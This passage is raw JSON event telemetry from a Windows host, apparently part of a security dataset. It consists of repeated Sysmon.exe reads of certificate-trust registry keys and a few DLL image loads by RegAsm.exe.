"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": 